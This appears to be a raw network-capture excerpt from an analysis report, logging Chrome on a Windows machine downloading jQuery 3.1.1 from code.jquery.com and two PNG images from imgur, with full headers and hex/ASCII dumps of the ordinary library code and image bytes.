2025-03-20 22:53:00 UTC	539	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:01 UTC	562	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Thu, 20 Mar 2025 22:53:01 GMT Via: 1.1 varnish Age: 1439465 X-Served-By: cache-lga21950-LGA X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1742511181.051812,VS0,VE8 Vary: Accept-Encoding
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-03-20 22:53:01 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.24	60843	199.232.196.193	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:01 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:01 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2214238 Date: Thu, 20 Mar 2025 22:53:01 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21939-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 0 X-Timer: S1742511182.798866,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-20 22:53:01 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.24	60842	199.232.196.193	443	692	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-20 22:53:01 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-20 22:53:01 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2263254 Date: Thu, 20 Mar 2025 22:53:01 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21937-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 0 X-Timer: S1742511182.802558,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-03-20 22:53:01 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 